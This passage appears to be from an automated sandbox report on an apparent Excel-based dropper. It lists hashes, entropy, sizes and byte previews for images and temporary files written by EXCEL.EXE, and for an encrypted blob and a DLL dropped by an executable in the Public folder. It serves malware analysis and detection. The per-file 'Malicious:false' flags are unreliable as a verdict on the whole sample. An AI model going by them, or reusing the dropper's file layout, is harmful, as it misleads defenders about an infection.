                                        Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A24FD9.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):498420
                                        Entropy (8bit):0.6413691154982258
                                        Encrypted:false
                                        SSDEEP:384:LTXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:fXwBkNWZ3cjvmWa+VDO
                                        MD5:3FBB8612EB4F2A6F9C2C41768FE72538
                                        SHA1:AAEFDEA1B614967532F5207AE0F38350B8753937
                                        SHA-256:986C659A2B737254905B4315A1437BEF4A81A3DBDADB3F00BD9637D3F377D636
                                        SHA-512:EBAD5D7E9BB93A4FC76EED47B96ED6F3AE0790FC075AD8B706745E1198FBCF3BB7D2CC03FDF39900C971EECA6E8CEECF1AC84DB61859F51352A7B6F59BDFA9BE
                                        Malicious:false
                                        Preview: ....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................-P$.......f7P.@o.%......(............RQ.Q.............p..$Q.Q...... ...Id7P...... ............d7P............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X..........8/P........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ...6...F....F...F..EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\486A184F.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\518BFEB2.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):68702
                                        Entropy (8bit):7.960564589117156
                                        Encrypted:false
                                        SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                        MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                        SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                        SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                        SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                        Malicious:false
                                        Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C9B604.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):10202
                                        Entropy (8bit):7.870143202588524
                                        Encrypted:false
                                        SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                        MD5:66EF10508ED9AE9871D59F267FBE15AA
                                        SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                        SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                        SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                        Malicious:false
                                        Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5481F451.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5927D635.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64991FDC.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 600 x 306, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):42465
                                        Entropy (8bit):7.979580180885764
                                        Encrypted:false
                                        SSDEEP:768:MUC94KctLo6+FkVfaapdydSo7CT3afPFUaV8v9TIzsrZsQ54kvd8gjDsss2Ur6:MJctLo63a8dydV+3WOa+90sZsSyMs+
                                        MD5:C31D090D0B6B5BCA539D0E9DB0C57026
                                        SHA1:D00CEE7AEE3C98505CDF6A17AF0CE28F2C829886
                                        SHA-256:687AFECEE6E6E286714FD267E0F6AC74BCA9AC6469F4983C3EF7168C65182C8D
                                        SHA-512:B23CA96097C2F5ED8CC251C0D6A34F643EE2251FDF3DEF6A962A168D82385CFEE2328D39FF86AADEA5EDBBF4D35882E6CD9CF8ECE43A82BD8F06383876B24756
                                        Malicious:false
                                        Preview: .PNG........IHDR...X...2......?^O..._PLTE.......................................................................gbh................j...^k....-.........................................>Jg......h..m.............l`.......qjG.9\LC..........u.*.'.................//F.......h.++..j...e....A.H?>.......|DG...........G./.`<..G...O:R..j...................................................tRNS.@..f...0IDATx..Z.s.4.]:.".F..Y.5.4!...WhiM..]Cv.Q......e.....x....~...x.g.%K.....X.....brG..sW:~g.Tu...U.R...W.V.U#TAr?..?}.C3.K...P..n..A..av?C..J.}.e.]...CA._y......~.2.^..Z..'...@......)....s.(...ey......{.)e..*]\-..yG2Ne.B....\@q....8.....W./i.C..P.*...O..e..7./..k:..t....]"../...F......y.......0`.3..g.)..Z...tR.bU.].B.Y...Ri^.R......D.*........=(tL.W.y....n.\.s..D.5.....c....8A....:;.)..].a]...;B0...B.0&@*.+..2..4....-X.>)..h~.J..".nO=VV.t...q..5......f.h......DPyJ*....E..:.....K.... ......E.%i..C..V..\.......z.^.r7.V...q.`....3..E3J8Ct.Z.l.GI.).R!b
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAF8DB0B.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):14828
                                        Entropy (8bit):7.9434227607871355
                                        Encrypted:false
                                        SSDEEP:384:zIZYVvfv3ZOxvHe5EmlbliA2r1BMWWTXRRO/QX:Td3Z46xiXzW/kO
                                        MD5:58DD6AF7C438B638A88D107CC87009C7
                                        SHA1:F25E7F2F240DC924A7B48538164A5B3A54E91AC6
                                        SHA-256:9269180C35F7D393AB5B87FB7533C2AAA2F90315E22E72405E67A0CAC4BA453A
                                        SHA-512:C1A3543F221FE7C2B52C84F6A12607AF6DAEF60CCB1476D6D3E957A196E577220801194CABC18D6A9A8269004B732F60E1B227C789A9E95057F282A54DBFC807
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..gp\.y>~v...WTb... ...!.M.H...d.J..3.8.(.L&.lM.d.o..$..q.D.I.....k,J.b3%QD!.Bt,.........p.+.....x?`....{.9o..W.q.Y.gM.g=.5"dm.V..M...iX..6....g=.R(..N'.0&.I(..B2..\...|.t......R.T.......J...Q.U....F.I..B.\...B.Z-....D")..,.J.....u..1.#....A.P.i..!...3.U1....RI..9....:..~..r..N.....Je,...l...(..CCC...v....a.l6KQ...ooo...d.fxx...k``...5.N.\.S.N...e2............b..7..8@.tgg.}..Ue7..e.G .`.J.d2)..B!M..r..T*Q.%..X.......{....,.q.\,.E".........z..*.abbB*...j.\.J.(.b.......|>...........R....L&..X.eYV"..-.R)B.T*M&..pX*.j.Z..9..F.Z.6....b.\./%..~...).B<..T*.z..D"..(...\...d2YKKK...mm.T*..l.T*..I$.x<..J..q..*.J .X..O>...C.d2.JI...:...#....xkk.B.(....D .8..t:..o>...:vC%MNNj.ZHZ....`.T....,...A.....l$.q.\f.....eY..8.+....`dd.b.X,.BH.T..4-..x.EV.|&.p.......O.P(.J.\>66.a.X,...><<....V.R.T*....d2.;v.....W.511.u.a....'..'...zkk.m.t:]__...ggg.o.............Y..z..a.....{..%.H..f...nw*..........'ND"...P(D"... .H..|>/.Hd2....EQ.
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9FC8190.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):19408
                                        Entropy (8bit):7.931403681362504
                                        Encrypted:false
                                        SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                        MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                        SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                        SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                        SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                        Malicious:false
                                        Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA3F8406.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):11303
                                        Entropy (8bit):7.909402464702408
                                        Encrypted:false
                                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                        Malicious:false
                                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDDAAE1E.png
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):6364
                                        Entropy (8bit):7.935202367366306
                                        Encrypted:false
                                        SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                        MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                        SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                        SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                        SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                        Malicious:false
                                        Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                        C:\Users\user\AppData\Local\Temp\8zftlgz66rml6hsb
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):218412
                                        Entropy (8bit):7.993510370418697
                                        Encrypted:true
                                        SSDEEP:6144:umeBJUO9Vjq25jLjIs+8FlB2qqoHfCarGr:6Bp9Vjq25jPImFlHbr8
                                        MD5:A66A52A4F615A7C03C69396F33AFB49F
                                        SHA1:70FCB923AEBCEFC959BC5EE119E2E6FCA2B522AD
                                        SHA-256:00C5F1976314ACC54F6689B202AA205BED647074381898370F3D13444A90B3DE
                                        SHA-512:964BEA08A7D6BF1C07240F48CE82B8410D5E7A789BBCD76917B615035073538AE77F098B9596A8C3E7AD5F4045BD4B36068FDD5F20CB6F803CF2B1B2FD49CB5D
                                        Malicious:false
                                        Preview: s\"5.;\.f..F.s...U.?[KmN.....#...IPVG:. |.\...b....z.I.x*...xR.r.R..1....iN...<..l...`|M,.)z.X...5....2e.~nV-AW.....7/f.V..L..Cv..r....e..v.6|._....(.K....b..4L.,..!..>.Wx.q,5.+WdL.....'..........r&-......."j.Ya..1...Wu(...X...k[.4.5.t'.]....g.~/.F.;\.fC.\.).%0_?.?.l..v......I.VGO. |.\.(..b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p..."..r."q,5 3.d/.O.?..............?tkz.b.i."j.Ya..1..aWu........Ik[.4.5.t'.])...g../SF.;\.fs.\..%0_?.?.......G...IPVG:. |.\...b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p...".Wx.q,5f.Wd/DO.?.............?tkz...i."j.Ya..1..aWu........Ik[.4.5.t'.])...g../SF.;\.fs.\..%0_?.?.......G...IPVG:. |.\...b....z.I.x*...xL.50R.4.s.M...M......s#:.|..^.s.FA.....K.P...l.d.......7/f.V..Y.a.D.. ........O..;...K...1...$...@._..p...".Wx.q,5f.Wd/DO.?.............?tkz...i."j.Ya..1..aWu..
                                        C:\Users\user\AppData\Local\Temp\nspBFD8.tmp\uoqeqjqp.dll
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):169472
                                        Entropy (8bit):6.369335775559218
                                        Encrypted:false
                                        SSDEEP:3072:BCDltBK32EKb80ZBphqHcPBZ6zDM2xIH51nzlVnwCg9:BCht9f5Y6Z6vMXzLG
                                        MD5:B99ADEF4A2044874BFEFBC6472A364FE
                                        SHA1:C8A100328B1F8480998AF4B82C75EF84C755D5F4
                                        SHA-256:C4BCD82279BD837652753D50D27E4461278991AB6BED3DA54F50003CFF804EEC
                                        SHA-512:DF07427D176374475A815896CB53F89EC71F47E0FEECD45054C4358A35C053F5E7900EC2A54CC4AB9EDA35C6EEBE18F47C79BFFE44E3D1514C406F9BA997CFFB
                                        Malicious:false
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................."...........................}...M......M......H......M......Rich...................PE..L......a...........!.........................0.......................................................................u......`v......................................`p...............................p..@............0..l............................text...l........................... ..`.rdata...S...0...T..................@..@.data....B.......&...n..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\~DF0A34D950D881ADFE.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):234520
                                        Entropy (8bit):7.970636264710058
                                        Encrypted:false
                                        SSDEEP:3072:gZfy7Qpz9a4UV0yosTOqZt+B0OH0UrmxKlwQyENBsGTDWgylTyUp7aQlelDjIWOM:ghXp5a4UFlYnHZix0wrGK3ta3VIpM
                                        MD5:90E995AE2B06B84644586091A994F43A
                                        SHA1:A6C83577FD947650A6B816FD910EBB7FD3464BCA
                                        SHA-256:1E8D78F614B82C1BDC730E745228B860D5B71888AC90EFBF5D74AF4EA3F876F9
                                        SHA-512:2AE4E833AA255BC20B870A2C08CE94E3A4CF7CD9248377CD4F5FBDC525F83AF8EAAB2DF1EBB82D1B7FC6E28F8A89DC10A1DB1C3A65100F656A7952A294B21B9F
                                        Malicious:false
                                        Preview: ......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        C:\Users\user\AppData\Local\Temp\~DF0FB8C472F0D83540.TMP
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
